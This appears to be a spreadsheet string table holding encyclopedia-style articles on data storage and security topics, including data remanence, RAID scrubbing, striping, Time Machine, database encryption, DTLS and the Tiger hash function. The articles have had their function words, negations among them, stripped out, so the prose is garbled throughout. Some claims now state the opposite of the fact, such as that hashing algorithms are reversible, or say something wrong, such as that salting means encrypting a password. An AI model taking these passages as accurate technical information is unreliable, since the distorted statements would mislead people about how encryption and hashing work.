truecrypt.: despite memory degradation, authors described study able take advantage redundancy keys stored expanded efficient use, scheduling. authors recommend computers powered down, rather left “sleep” state, physical control owner. cases, certain modes software program bitlocker, authors recommend boot password removable device used.: tresor kernel patch linux specifically intended prevent cold boot attacks ensuring encryption keys accessible user space stored rather system whenever possible. newer versions disk encryption software veracrypt encrypt in-ram keys passwords 64-bit windows. standards australiaasd 2014, australian government information security manual, 2014 canadarcmp b2-002, media overwrite secure erase products, 2009 communications security establishment clearing declassifying electronic data storage devices, july 2006 zealandgcsb nzism 2016, zealand information security manual v2.5, july 2016 nzsis 2009, protective security manualunited kingdomasset disposal information security alliance (adisa), adisa asset disposal security standardunited statesnist special publication 800-88, guidelines media sanitization, september 2006 5220.22-m, national industrial security program operating manual (nispom), february 2006 current editions longer contain references specific sanitization methods. standards sanitization left cognizant security authority. although nispom text never described specific methods sanitization, past editions (1995 1997) contain explicit sanitization methods within defense security service (dss) clearing sanitization matrix inserted section 8-306. still provides matrix continues specify methods. 2007 edition matrix, overwriting longer acceptable sanitization magnetic media. only degaussing (with approved degausser) physical destruction acceptable. army ar380-19, information systems security, february 1998 replaced 25-2 https://armypubs.army.mil/epubs/dr_pubs/dr_a/pdf/web/arn17503_ar25_2_admin_final.pdf (army publishing directorate, 2009) force afssi 8580, remanence security, november 2008 navy navso p5239-26, remanence security, september 1993 also references further reading guide understanding data remanence automated information systems. national computer security center. september 1991. retrieved 2007-12-10. (rainbow series "forrest green book") tutorial disk drive data sanitization gordon hughes, ucsd center magnetic recording research, coughlin, coughlin associates</t>
  </si>
  <si>
    <t>Data scrubbing</t>
  </si>
  <si>
    <t>data scrubbing error correction technique uses background task periodically inspect main memory storage errors, corrects detected errors using redundant data form different checksums copies data. data scrubbing reduces likelihood single correctable errors accumulate, leading reduced risks uncorrectable errors. data integrity high-priority concern writing, reading, storage, transmission, processing computer data computer operating systems computer storage data transmission systems. however, currently existing used file systems provide sufficient protection data corruption.to address issue, data scrubbing provides routine checks inconsistencies data and, general, prevention hardware software failure. this "scrubbing" feature occurs commonly memory, disk arrays, file systems, fpgas mechanism error detection correction. raid with data scrubbing, raid controller periodically read hard disk drives raid array check defective blocks applications might actually access them. this reduces probability silent data corruption data loss bit-level errors.in dell poweredge raid environments, feature called "patrol read" perform data scrubbing preventive maintenance. openbsd, bioctl(8) utility allows system administrator control patrol reads biocpatrol ioctl /dev/bio pseudo-device; 2019, functionality supported device drivers logic dell controllers includes mfi(4) since openbsd (2015) mfii(4) since openbsd (2018). freebsd dragonfly bsd, patrol controlled raid controller-specific utility mfiutil(8) since freebsd (2009) (2010). implementation freebsd used openbsd developers adding patrol support generic bio(4) framework bioctl utility, without need separate controller-specific utility. netbsd 2008, bio(4) framework openbsd extended feature support consistency checks, implemented /dev/bio pseudo-device biocsetstate ioctl command, options start stop (bioc_sscheckstart_vol bioc_sscheckstop_vol, respectively); supported single driver 2019 arcmsr(4).linux raid, software raid implementation, makes data consistency checks available provides automated repairing detected data inconsistencies. such procedures usually performed setting weekly cron job. maintenance performed issuing operations check, repair, idle examined devices. statuses performed operations, well general raid statuses, always available. file systems btrfs copy-on-write (cow) file system linux, btrfs provides fault isolation, corruption detection correction, file-system scrubbing. file system detects checksum mismatch reading block, first tries obtain create) good copy block another device internal mirroring raid techniques use.btrfs initiate online check entire file system triggering file system scrub performed background. scrub scans entire file system integrity automatically attempts report repair blocks finds along way. features zfs, combined file system logical volume manager, include verification data corruption modes, continuous integrity checking, automatic repair. microsystems designed ground focus data integrity protect data disks issues disk firmware bugs ghost writes.zfs provides repair utility called scrub examines repairs silent data corruption caused data problems. memory high integration density contemporary computer memory chips, individual memory cell structures became small enough vulnerable cosmic rays and/or alpha particle emission. errors caused phenomena called soft errors. this problem dram- sram-based memories. memory scrubbing error-detection correction errors computer using memory, copies data, error-correction codes. fpga scrubbing technique used reprogram fpga. used periodically avoid accumulation errors without need find configuration bitstream, thus simplifying design. numerous approaches taken respect scrubbing, simply reprogramming fpga partial reconfiguration. simplest method scrubbing completely reprogram fpga periodic rate (typically 1/10 calculated upset rate). however, fpga operational reprogram time, order micro milliseconds. situations cannot tolerate type interruption, partial reconfiguration available. this technique allows fpga reprogrammed still operational. also data corruption data degradation error detection correction fsck tool checking consistency file system chkdsk similar fsck, used windows operating systems references external links soft errors electronic memory</t>
  </si>
  <si>
    <t>Data striping</t>
  </si>
  <si>
    <t>computer data storage, data striping technique segmenting logically sequential data, file, consecutive segments stored different physical storage devices. striping useful processing device requests data quickly single storage device provide spreading segments across multiple devices accessed concurrently, total data throughput increased. also useful method balancing load across array disks. striping used across disk drives redundant array independent disks (raid) storage, network interface controllers, disk arrays, different computers clustered file systems grid-oriented storage, systems. method method striping done interleaving sequential segments storage devices round-robin fashion beginning data sequence. this works well streaming data, subsequent random accesses require knowledge device contains data. data stored physical address data segment assigned one-to-one mapping particular device, device access segment requested calculated address without knowing offset data within full sequence. other methods might employed sequential segments stored sequential devices. such non-sequential interleaving benefits error correction schemes. advantages disadvantages advantages striping include performance throughput. sequential time interleaving data accesses allows lesser data access throughput storage devices cumulatively multiplied number storage devices employed. increased throughput allows data processing device continue work without interruption, thereby finish procedures quickly. this manifested improved performance data processing. because different segments data kept different storage devices, failure device causes corruption full data sequence. effect, failure rate array storage devices equal failure rate storage device. this disadvantage striping overcome storage redundant information, parity, purpose error correction. system, disadvantage overcome cost requiring extra storage. terminology segments sequential data written read disk operation continues next disk usually called chunks, strides stripe units, logical groups forming single striped operations called strips stripes. amount data chunk (stripe unit), often denominated bytes, variously referred chunk size, stride size, stripe size, stripe depth stripe length. number data disks array sometimes called stripe width, also refer amount data within stripe.the amount data stride multiplied number data disks array (i.e., stripe depth times stripe width, geometrical analogy would yield area) sometimes called stripe size stripe width. wide striping occurs chunks data spread across multiple arrays, possibly drives system. narrow striping occurs chunks data spread across drives single array. applications data striping used databases, sybase, certain raid devices software hardware control, ibm's 9394 ramac array subsystem. file systems clusters also striping. oracle automatic storage management allows files either coarse fine striped. raid raid configurations, raid failure single member drive raid array causes stored data lost. raid configurations, raid contains distributed parity provides redundancy, member drive fails data restored using drives array.lvm2 data striping also achieved linux's logical volume management (lvm). system allows adjustment coarseness striping pattern. tools allow implementation data striping conjunction mirroring. offers added benefit read write caching express slow spinning storage. advantages directly related data striping (like snapshots, dynamic resizing, etc).btrfs have raid like features security chunk integrity detect blocks, added flexibility adding arbitrary numbers extra drives. they also advantages directly related data striping (copy write, etc). also partition alignment link aggregation references</t>
  </si>
  <si>
    <t>Data synchronization</t>
  </si>
  <si>
    <t>synchronization process establishing consistency among data source target data storage vice versa continuous harmonization data time. fundamental wide variety applications, including file synchronization mobile device synchronization e.g., pdas. synchronization also useful encryption synchronizing public servers. file-based solutions there tools available file synchronization, version control (cvs, subversion, etc.), distributed filesystems (coda, etc.), mirroring (rsync, etc.), attempt keep sets files synchronized. however, version control file synchronization tools deal modifications copy files. file synchronization commonly used home backups external hard drives updating transport flash drives. automatic process prevents copying already identical files, thus save considerable time relative manual copy, also faster less error prone. version control tools intended deal situations user attempts simultaneously modify file, file synchronizers optimized situations copy file edited time. reason, although version control tools used file synchronization, dedicated programs require less overhead. distributed filesystems also seen ensuring multiple versions file synchronized. this normally requires devices storing files always connected, distributed file systems like coda allow disconnected operation followed reconciliation. merging facilities distributed file system typically limited version control system file systems keep version graph. mirror (computing): mirror exact copy data set. internet, mirror site exact copy another internet site. mirror sites commonly used provide multiple sources information, particular value providing reliable access large downloads. theoretical models several theoretical models data synchronization exist research literature, problem also related problem slepian–wolf coding information theory. models classified based consider data synchronized. unordered data problem synchronizing unordered data (also known reconciliation problem) modeled attempt compute symmetric difference {\displaystyle s_{a}\oplus s_{b}=(s_{a}-s_{b})\cup (s_{b}-s_{a})} remote sets {\displaystyle s_{a}} {\displaystyle s_{b}} b-bit numbers. some solutions problem typified wholesale transfer case data transferred host local comparison. timestamp synchronization case changes data marked timestamps. synchronization proceeds transferring data timestamp later previous synchronization. mathematical synchronization case data treated mathematical objects synchronization corresponds mathematical process. ordered data case, remote strings {\displaystyle \sigma _{a}} {\displaystyle \sigma _{b}} need reconciled. typically, assumed strings differ fixed number edits (i.e. character insertions, deletions, modifications). then data synchronization process reducing edit distance {\displaystyle \sigma _{a}} {\displaystyle \sigma _{b}} ideal distance zero. this applied filesystem based synchronizations (where data ordered). many practical applications discussed referenced above. sometimes possible transform problem unordered data process known shingling (splitting strings shingles). error handling fault-tolerant systems, distributed databases must able cope loss corruption (part data. first step usually replication, involves making multiple copies data keeping date changes made. however, necessary decide copy rely loss corruption instance occurs. simplest approach single master instance sole source truth. changes replicated instances, instances becomes master master fails. paxos raft complex protocols exist solve problems transient effects failover, instances thinking master time. secret sharing useful failures whole nodes common. this moves synchronization explicit recovery process part read, read data requires retrieving encoded data several different nodes. corrupt out-of-date data present nodes, approach also benefit error correction code. dhts blockchains solve problem synchronization many nodes (hundreds billions). also syncml, standard mainly calendar, contact email synchronization synchronization (computer science) references</t>
  </si>
  <si>
    <t>Time triple modular redundancy</t>
  </si>
  <si>
    <t>time triple modular redundancy, also known ttmr, patented single-event upset mitigation technique detects corrects errors computer microprocessor. ttmr allows long instruction word (vliw) style microprocessors space applications external sources, radiation, would cause elevated rate errors. ttmr permits triple modular redundancy (tmr) protection single processor. space micro developed patented ttmr. implemented space micro's space qualified single-board computers, proton200k. external links ttmr patent</t>
  </si>
  <si>
    <t>DataCore</t>
  </si>
  <si>
    <t>datacore, also known datacore software, developer software-defined storage based fort lauderdale, florida, united states. company pioneer development virtualization technology, offers software-defined storage solutions block, file, object storage across bare metal, virtual, container, cloud, hybrid environments. history datacore founded fort lauderdale february 1998 george teixeira ziya aral, co-workers parallel computing company encore computer. premise behind company allow network operators purchase commodity disk drives, external storage arrays disk drive arrays, treat virtual disks networked, block-access storage. this storage controlled using datacore software. they joined former encore colleagues, worked without january 1999, company secured first funding round, million.in 2000, company million series funding round.in 2006, seeing exodus venture funding, company employees mortgaged homes keep business going, 2008 us$30 million round funding stabilized company finances.in 2011, company launched sansymphony-v, upgrade storage virtualization software offering faster performance.in april 2014, company released version sansymphony product.in march 2015, datacore partnered chinese technology vendor huawei sansymphony-v software huawei's fusionserver create virtual storage networks.in 2016, company's sansymphony-v software reported price performance records based testing done redwood city, california-based non-profit testing company storage performance council using spc-1 storage performance benchmark. results complaints multiple vendors, claimed storing "test" data cache made results unfair. three spc-1 benchmark results later withdrawn.in march 2017, company partnered technology company lenovo develop data center business integrating datacore's sansymphony software defined storage lenovo's servers. this reportedly compete companies like nutanix simplivity (now part hewlett packard enterprise (hpe)) shipping whole hyper-converged stacks rather software-defined storage component. september 2017, attempt compete in-memory database features server, company released maxparallel driver, uses parallel technology accelerate database-related processing server databases. this product discontinued august 2018.in april 2018 datacore announced dave zabrowski, previously cloud-based financial services company cloud cruiser, ceo, former george teixeira named executive chairman.in october 2019, datacore awarded patent performing parallel operations.in february 2020, datacore, together cloud ventures insight partners, invested million palo alto-based mayadata. month, datacore launched global research development center bangalore, india.in january 2021, datacore acquired caringo, inc., enabling company offer complete storage solution portfolio including block, file, object storage. datacore announced global availability datacore swarm object storage software april 2021 result acquisition. november 2021, datacore acquired mayadata, original developer cloud-native storage platform openebs mayastor.in 2022, datacore launched bolt, container-native storage software deploy stateful applications scale kubernetes clusters. products/technology datacore develops software help companies manage data storage infrastructure. sansymphony virtualizes block storage across range storage devices (san hci) provides uniform data services across them. vfilo simplifies shared access, control, protection distributed file systems. swarm on-premises object storage platform simplifies data access, delivery, archiving. bolt automates manages storage services kubernetes environments harnessing high-performance, low-latency attributes nvme fabrics. references external links official website</t>
  </si>
  <si>
    <t>Time Machine (macOS)</t>
  </si>
  <si>
    <t>time machine backup mechanism macos, desktop operating system developed apple. software designed work local storage devices network-attached disks, commonly used external disk drives connected using either thunderbolt. first introduced 10.5 leopard, appeared october 2007 incrementally refined subsequent releases macos. time machine revamped macos support apfs, thereby enabling "faster, compact, reliable backups" possible previously. overview time machine creates incremental backups files restored later date. allows user restore whole system specific files. also works within number applications mail iwork, making possible restore individual objects (e.g. emails, contacts, text documents, presentations) without leaving application. according apple support statement: “time machine backup utility, archival utility, intended offline storage. time machine captures recent state data disk. snapshots age, prioritized progressively lower compared recent ones.” backups network drive, time machine allows user back computers network, supports backing certain network attached storage devices servers, depending version time machine. earlier versions worked wide variety servers, later versions require server support recent version apple's apple filing protocol (afp) recent version server message block (smb) protocol, time machine longer works servers using earlier versions smb. some legacy support re-enabled using hand-tuned configuration options, accessed terminal. apple's time capsule, introduced 2008 discontinued 2018, acted network storage device specifically time machine backups, allowing wired wireless backups time capsule's internal hard drive. time machine also used external internal volumes. time machine saves hourly backups past hours, daily backups past month, weekly backups everything older month volume runs space. point, time machine deletes oldest weekly backup. revamp macos time machine overhauled macos utilize apfs, apple's modern file system first introduced 2016. specifically, version time machine makes apfs's snapshot technology. according apple, enables "faster, compact, reliable backups" possible previously hfs+-formatted drives. independent evaluation claim found macos 11's time machine implementation conjunction apfs 2.75-fold faster upon initial local backup 4-fold faster upon subsequent backups relative macos 10.15's time machine implementation using hfs+. modest nevertheless significant advantage noted well backups network-attached disks.new local (i.e. usb- thunderbolt-connected) network-connected time machine backup destinations formatted apfs default, though time machine continue backing existing hfs+ backup volumes." there option convert existing, hfs+-based backups apfs; instead, users want benefit advantages new, apfs-based implementation time machine need start fresh volume.at least circumstances, encryption appears required (instead merely optional) version time machine. user interface time machine's user interface retrieving file uses apple's core animation api. upon launch, time machine "floats" active finder application window user's desktop backdrop depicting user's blurred desktop wallpaper. behind current active window stacked windows, window representing snapshot folder application looked given date time past. when toggling previous snapshots, stacked windows extend backwards, giving impression flying "time tunnel." while paging "windows past", previous version data currently deleted data) retrieved. storage time machine works locally connected storage disks, must formatted apfs hfs+ volume formats. support backing apfs volumes added macos since apfs default volume format. time machine also works remote storage media shared systems, including time capsule, network. when using remote storage, time machine uses sparse bundles. this acts isolation layer, makes storage neutral actual file system used network server, also permits replication backup storage medium another. sparse bundles mounted macos like device, presenting content hfs+ formatted volume, functionally similar local storage. requirements time machine places strict requirements backup storage medium. officially supported configurations are: storage drive partition connected directly computer, either internally like thunderbolt formatted apfs journaled hfs+. volume format correct, time machine prompt user reformat folder another network. drive shared apple time capsule network. drive connected apple airport extreme 802.11ac model network. (earlier generations airport extreme supported.) local network volumes connected using apple filing protocol smb3 share advertises number capabilities.on time capsule, backup data stored hfs+ disk image accessed apple filing protocol. although officially supported, users manufacturers also configured freebsd linux servers network-attached storage systems serve time machine-enabled macs. there also software tools available market copy files inside time machine backups windows machines. operation time machine creates folder designated time machine volume (local inside remote sparse image) copies directory tree locally attached storage drives, except files directories user specified omit, including time machine volume itself. every hour thereafter, creates subordinate folder copies files changed since last backup creates case hfs+ volumes) hard links files already exist backup drive. user browse directory hierarchy copies browsing primary disk.some backup utilities save deltas file changes, much like version control systems. such approach permits frequent backups minor changes, often complicate interaction backup volume. contrast, possible manually browse time machine backup volume without using time machine interface; time machine presents backup user complete disk copy.time machine hfs+ volumes creates multiple hard links unmodified directories. multiple linking directories peculiar feature hfs+, supported modern unix file systems including apple's apfs. result, tools like rsync cannot used replicate time machine volume; replication reliably done imaging entire filesystem. apple system events record directory modified hard drive. this means instead examining every file's modification date activated, time machine needs scan directories changed files copy. this differs approach taken similar backup utilities rsync flyback, examine modification dates files backup. time machine also available macos installation process. features migration assistant interface restore contents time machine backup. words, hard drive restored time machine backup event catastrophic crash. mountain lion introduced ability multiple volumes simultaneously time machine operations. when user specifies volume use, macos rotates among desired volumes time backup. exclusion time machine supports forms exclusion: based user-configured list paths (plus system defaults), based extended file attribute com.apple.metadata:com_apple_backup_excludeitem dependencies. since attribute applied file directory directly, moving copying affect exclusion. attribute contain string com.apple.backup property list format. writing com.apple.mobilebackup instead sets exclusion backups.google chrome known attribute exclude histories. third-party backup applications respect setting include crashplan arq. apple wraps attribute tmutil command-line utility well coreservices api. also mobileme backup list backup software version control airport time capsule backup options built microsoft windows: system restore, file history references external links apple support: back time machine 10.5 leopard review technica brief history time machine evolution using apfs, howard oakley</t>
  </si>
  <si>
    <t>Database encryption</t>
  </si>
  <si>
    <t>database encryption generally defined process uses algorithm transform data stored database "cipher text" incomprehensible without first decrypted. therefore said purpose database encryption protect data stored database accessed individuals potentially "malicious" intentions. encrypting database also reduces incentive individuals hack aforementioned database "meaningless" encrypted data little hackers. there multiple techniques technologies available database encryption, important detailed article. transparent/external database encryption transparent data encryption (often abbreviated tde) used encrypt entire database, therefore involves encrypting "data rest". data rest generally defined "inactive" data currently edited pushed across network. example, text file stored computer rest" opened edited. data rest stored physical storage media solutions tapes hard disk drives. storing large amounts sensitive data physical storage media naturally raises concerns security theft. ensures data physical storage media cannot read malicious individuals intention steal them. data cannot read worthless, thus reducing incentive theft. perhaps important strength attributed transparency. given encrypts data said applications need altered order correctly. important note encrypts entirety database well backups database. transparent element fact encrypts "the page level", essentially means data encrypted stored decrypted called system's memory. contents database encrypted using symmetric often referred "database encryption key". column-level encryption order explain column-level encryption important outline basic database structure. typical relational database divided tables divided columns rows data. whilst usually encrypts entire database, column-level encryption allows individual columns within database encrypted. important establish granularity column-level encryption causes specific strengths weaknesses arise compared encrypting entire database. firstly, ability encrypt individual columns allows column-level encryption significantly flexible compared encryption systems encrypt entire database tde. secondly, possible entirely unique separate encryption column within database. this effectively increases difficulty generating rainbow tables thus implies data stored within column less likely lost leaked. main disadvantage associated column-level database encryption speed, loss thereof. encrypting separate columns different unique keys database cause database performance decrease, additionally also decreases speed contents database indexed searched. field-level encryption experimental work done providing database operations (like searching arithmetical operations) encrypted fields without need decrypt them. strong encryption required randomized different result must generated time. this known probabilistic encryption. field-level encryption weaker randomized encryption, allows users test equality without decrypting data. filesystem-level encryption encrypting file system (efs) important note traditional database encryption techniques normally encrypt decrypt contents database. databases managed "database management systems" (dbms) existing operating system (os). this raises potential security concern, encrypted database running accessible potentially vulnerable operating system. encrypt data part database system, implies scope encryption much wider compared system capable encrypting database files. whilst widen scope encryption, also decreases database performance cause administration issues system administrators require operating system access efs. issues concerning performance, typically used databasing applications require frequent database input output. order offset performance issues often recommended systems used environments users. full disk encryption bitlocker performance concerns associated efs. symmetric asymmetric database encryption symmetric database encryption symmetric encryption context database encryption involves private applied data stored called database. this private alters data causes unreadable without first decrypted. data encrypted saved, decrypted opened given user knows private key. thus data shared database receiving individual must copy secret used sender order decrypt view data. clear disadvantage related symmetric encryption sensitive data leaked private spread individuals access data. however, given involved encryption process generally said speed advantage symmetric encryption. asymmetric database encryption asymmetric encryption expands symmetric encryption incorporating different types keys encryption method: private public keys. public accessed anyone unique user whereas private secret unique known user. scenarios public encryption whereas private decryption key. example, individual would like send message individual using asymmetric encryption, would encrypt message using individual public send encrypted version. individual would able decrypt message using private key. individual would able decrypt individual message, individual private individual private key. asymmetric encryption often described secure comparison symmetric database encryption given private keys need shared separate keys handle encryption decryption processes. performance reasons, asymmetric encryption used management rather encrypt data usually done symmetric encryption. management "symmetric asymmetric database encryption" section introduced concept public private keys basic examples users exchange keys. exchanging keys becomes impractical logistical point view, many different individuals need communicate each-other. database encryption system handles storage exchange keys. this process called management. encryption keys managed stored properly, highly sensitive data leaked. additionally, management system deletes loses key, information encrypted said essentially rendered "lost" well. complexity management logistics also topic needs taken consideration. number application firm uses increases, number keys need stored managed increases well. thus necessary establish keys applications managed single channel, also known enterprise management. enterprise management solutions sold great number suppliers technology industry. these systems essentially provide centralised management solution allows administrators manage keys system hub. thus said introduction enterprise management solutions potential lessen risks associated management context database encryption, well reduce logistical troubles arise many individuals attempt manually share keys. hashing hashing used database systems method protect sensitive data passwords; however also used improve efficiency database referencing. inputted data manipulated hashing algorithm. hashing algorithm converts inputted data string fixed length stored database. hashing systems crucially important characteristics outlined. firstly, hashes "unique repeatable". example, running word "cat" hashing algorithm multiple times always yield hash, however extremely difficult find word return hash "cat" does. secondly, hashing algorithms reversible. relate back example provided above, would nearly impossible convert output hashing algorithm back original input, "cat". context database encryption, hashing often used password systems. when user first creates password hashing algorithm saved hash. when user logs back website, password enter hashing algorithm compared stored hash. given fact hashes unique, hashes match said user inputted correct password. example popular hash function (secure hash algorithm) 256. salting issue arises using hashing password management context database encryption fact malicious user could potentially input hash table rainbow table specific hashing algorithm system uses. this would effectively allow individual decrypt hash thus access stored passwords. solution issue 'salt' hash. salting process encrypting password database. information added string hashed, difficult becomes collate rainbow tables. example, system combine user's email password single hash. this increase complexity hash means difficult thus less likely rainbow tables generated. this naturally implies threat sensitive data loss minimised salting hashes. pepper some systems incorporate "pepper" addition salts hashing systems. pepper systems controversial, however still necessary explain use. pepper value added hashed password salted. this pepper often unique website service, important note pepper usually added passwords saved database. theory inclusion peppers password hashing systems potential decrease risk rainbow (input hash) tables, given system-level specificity peppers, however real world benefits pepper implementation highly disputed. application-level encryption application-level encryption, process encrypting data completed application used generate modify data encrypted. essentially means data encrypted written database. this unique approach encryption allows encryption process tailored user based information (such entitlements roles) application knows users.according eugene pilyankevich, "application-level encryption becoming good practice systems increased security requirements, general drift toward perimeter-less exposed cloud systems". advantages application-level encryption important advantages application-level encryption fact application-level encryption potential simplify encryption process used company. application encrypts data writes/modifies database secondary encryption tool need integrated system. second main advantage relates overarching theme theft. given data encrypted written server, hacker would need access database contents well applications used encrypt decrypt contents database order decrypt sensitive data. disadvantages application-level encryption first important disadvantage application-level encryption applications used firm need modified encrypt data themselves. this potential consume significant amount time resources. given nature opportunity cost firms believe application-level encryption worth investment. addition, application-level encryption limiting effect database performance. data database encrypted multitude different applications becomes impossible index search data database. ground reality form basic example: would impossible construct glossary single language book written languages. lastly complexity management increases, multiple different applications need authority access encrypt data write database. risks database encryption when discussing topic database encryption imperative aware risks involved process. first risks related management. private keys managed "isolated system", system administrators malicious intentions ability decrypt sensitive data using keys access fundamental principle keys also gives rise potentially devastating risk: keys lost encrypted data essentially lost well, decryption without keys almost impossible. references</t>
  </si>
  <si>
    <t>Databending</t>
  </si>
  <si>
    <t>databending data bending) process manipulating media file certain format, using software designed edit files another format. distortions medium typically occur result, process either falls broader category frequently employed glitch art. process techniques term databending derived circuit bending, objects children's toys, effects pedals electronic keyboards deliberately short circuited bending circuit board produce erratic spontaneous sounds. like circuit bending, databending involves (often unpredictable) alteration target's behavior. databending achieves alteration manipulating information within media file certain format, using software designed edit files different format; distortions medium typically occur result.many techniques exist, including editors manipulate certain components compression algorithm, comparatively simple methods. michael betancourt posed short instructions, included signal culture cookbook, involves direct manipulation digital file using hexadecimal editing program. method involves addition audio effects audio editing software distort data interpretations image files. some effects produce optical analogues: adding echo filter duplicated elements photo, inversion contributed flipping image. similarities result waveforms corresponding layers pixels linear fashion, ordered bottom. another method, dubbed "the wordpad effect", uses program wordpad manipulate images converting data rich text format. categorization according artist benjamin berg, different techniques process grouped three categories: incorrect editing: files certain format manipulated using software designed edit files different format. reinterpretation: files simply converted medium another. forced errors: known software bugs exploited force program terminate, usually writing file.the "wordpad effect" would fall incorrect editing, reinterpretation contains subcategory called sonification, data audio introduced simultaneously musical audio data. last technique hardest three accomplish, often yielding highly unpredictable results. usage reception databending frequently employed glitch art, considered sub-category genre. sonification technique commonly used glitch musicians alva noto. ahuja summarized process quote adam clark estes gizmodo "the internet's code-heavy version graffiti." various groups flickr explore effects databending imagery; internet named "glitchbot" created scrape creative commons-licensed imagery apply process upload results. users vimeo deal explicitly databending glitch general exist, chicago-based digital project named gli.tc/h funded using kickstarter 2011. also compression artifact references external links simple protocol databending michael betancourt glitch application georg fischer glitchbot flickr official website gli.tc/h databending using audacity antonio roberts</t>
  </si>
  <si>
    <t>Datagram Transport Layer Security</t>
  </si>
  <si>
    <t>datagram transport layer security (dtls) communications protocol providing security datagram-based applications allowing communicate designed prevent eavesdropping, tampering, message forgery. dtls protocol based stream-oriented transport layer security (tls) protocol intended provide similar security guarantees. dtls protocol datagram preserves semantics underlying transport—the application suffer delays associated stream protocols, uses sctp, application deal packet reordering, loss datagram data larger size datagram network packet. because dtls uses sctp rather tcp, avoids "tcp meltdown problem", used create tunnel. definition following documents define dtls: 9147 user datagram protocol (udp), 5238 datagram congestion control protocol (dccp), 5415 control provisioning wireless access points (capwap), 6083 stream control transmission protocol (sctp) encapsulation, 5764 secure real-time transport protocol (srtp) subsequently called dtls-srtp draft secure real-time transport control protocol (srtcp).dtls based 1.1, dtls based 1.2, dtls based 1.3. there dtls version-number skipped order harmonize version numbers tls. like previous dtls versions, dtls intended provide "equivalent security guarantees 1.3] exception order protection/non-replayability". implementations libraries applications cisco anyconnect client uses invented dtls based vpn. openconnect open source anyconnect-compatible client ocserv server supports (d)tls. cisco intercloud fabric uses dtls form tunnel private public/provider compute environments zscaler popular solution) uses dtls tunneling networks edge client uses dtls citrix systems netscaler uses dtls secure browsers: google chrome, opera firefox support dtls-srtp webrtc. firefox onward support dtls 1.0. vulnerabilities february 2013 researchers royal holloway, university london discovered timing attack allowed recover (parts the) plaintext dtls connection using openssl gnutls implementation dtls cipher block chaining mode encryption used. also zrtp reliable user datagram protocol quic wireguard references external links "transport layer security (tls) charter". ietf. modadugu, nagendra; rescorla, eric (2003-11-21). "the design implementation datagram tls" (pdf). stanford crypto group. retrieved 2013-03-17. alfardan, nadhem paterson, kenneth "plaintext-recovery attacks against datagram tls" (pdf). retrieved 2013-11-25. gibson, steve; laporte, (2012-11-28). "datagram transport layer security". security 380. retrieved 2013-03-17. skip 1:07:14. robin seggelmann's sample code: echo, character generator, discard client/servers. illustrated dtls connection</t>
  </si>
  <si>
    <t>Tiger (security software)</t>
  </si>
  <si>
    <t>tiger security software unix-like computer operating systems. used security audit tool host-based intrusion detection system supports multiple unix platforms. tiger free license unlike tools, needs posix tools, written entirely shell language. tiger based modular scripts either together independently check different aspects unix system including review available patches installed filesystem permissions dormant users specific configuration system files history tiger originally developed douglas schales, dave hess, khalid warraich, dave safford 1992 texas university. tool originally developed provide check unix systems campus accessed campus and, consequently, required clearance network security measures place. developed coordinated attack august 1992 computers campus. campus system administrators needed something user could test system's security could figure machines. tool presented fourth usenix security symposium. written time auditing tools cops, satan internet security scanner written. eventually, 2.2.4 version, released 1994, development tiger stalled.three different forks evolved tiger: tara (developed advanced research computing tiger analytical research assistant), internally developed corporation bryan gartner last developed debian gnu/linux distribution javier fernández-sanguino (current upstream maintainer). forks aimed making tiger work newer versions different unix operating systems. these forks merged 2002 june 2002 source code, labeled release, published download section newly created savannah site. following merge, following releases published: release published october 2002, considered unstable release included checks, autoconf script automatic configuration, mostly included fixes bugs found testing tiger debian gnu/linux operating systems. over 2,200 lines code documentation included release. release published 2003. improved stability tool fixed security problems including buffer overflow realpath. 3.2.1 release published october 2003. introduced checks including: check_ndd (for hpux sunos systems), check_passwspec (for linux hpux) check_trusted (for hpux), check_rootkit (which interact chkrootkit tool), check_xinetd, and, finally, aide_run integrit_run (integrity file checkers). 3.2.2 release published august 2007. introduced support tru64, solaris this release also introduced audit scripts, collection scripts originally written marc heuse used offline audits systems recovering needed information putting archive. these scripts intended security operating systems baselines checklists. 3.2.3 release published september 2007. mainly release also included features related handling exotic filesystems linux. overview tiger interesting features including modular design easy expand. used audit tool host-based intrusion detection system tool described program's manpage source code documentation (readme.hostids). tiger complements intrusion detection system (ids) (from network snort), kernel (log-based intrusion detection system lids, snare linux systrace openbsd, example), integrity checkers (many these: aide, integrit, samhain, tripwire...) logcheckers, providing framework work together checking system configuration status. references</t>
  </si>
  <si>
    <t>Tiger (hash function)</t>
  </si>
  <si>
    <t>cryptography, tiger cryptographic hash function designed ross anderson biham 1995 efficiency 64-bit platforms. size tiger hash value bits. truncated versions (known tiger/128 tiger/160) used compatibility protocols assuming particular hash size. unlike sha-2 family, distinguishing initialization values defined; simply prefixes full tiger/192 hash value. tiger2 variant message padded first appending byte hexadecimal value 0x80 md4, sha, rather hexadecimal value 0x01 case tiger. variants otherwise identical. algorithm tiger based merkle–damgård construction. one-way compression function operates 64-bit words, maintaining words state processing words data. there rounds, using combination operation mixing addition/subtraction, rotates, s-box lookups, fairly intricate scheduling algorithm deriving round keys input words. although fast software, tiger's large s-boxes (four s-boxes, 64-bit entries totaling kib) make implementations hardware microcontrollers difficult. usage tiger frequently used merkle hash tree form, referred (tiger tree hash). used many clients direct connect gnutella file sharing networks, optionally included bittorrent metafile better content availability. tiger considered inclusion openpgp standard, abandoned favor ripemd-160. 2440 refers tiger oid, whereas coding standards list tiger 1.3.6.1.4.1.11591.12.2. ipsec subtree, hmac-tiger assigned 1.3.6.1.5.5.8.1.3. announced yet. byte order specification tiger define output printed defines result three ordered 64-bit integers. "testtiger" program author's homepage intended allow easy testing test source code, rather define particular print order. protocols direct connect well program tthsum little-endian byte order, also preferred authors. examples example below, 192-bit (24-byte) tiger hashes represented hexadecimal digits little-endian byte order. following demonstrates 43-byte ascii input corresponding tiger hashes: tiger("the quick brown jumps lazy dog") 6d12a41e72e644f017b6f0e2f7b44c6285f06dd5d2c5b075 tiger2("the quick brown jumps lazy dog") 976abff8062a2e9dcea3a1ace966ed9c19cb85558b4976d8 even small change message (with high probability) result completely different hash, e.g. changing tiger("the quick brown jumps lazy cog") a8f04b0f7201a0d728101c9d26525b31764a3493fcd8458f tiger2("the quick brown jumps lazy cog") 09c11330283a27efb51930aa7dc1ec624ff738a8d9bdd3df hash zero-length string tiger("") 3293ac630c13f0245f92bbb1766e16167a4e58492dde73f3 tiger2("") 4441be75f6018773c206c22745374b924aa8313fef919f41 cryptanalysis unlike sha-0/1, known effective attacks full 24-round tiger except pseudo-near collision. while processes state simple 32-bit operations 512-bit block sha-1 tiger updates state total operations 512-bit block, additionally strengthened large s-box look-ups. john kelsey stefan lucks found collision-finding attack 16-round tiger time complexity equivalent compression function invocations another attack finds pseudo-near 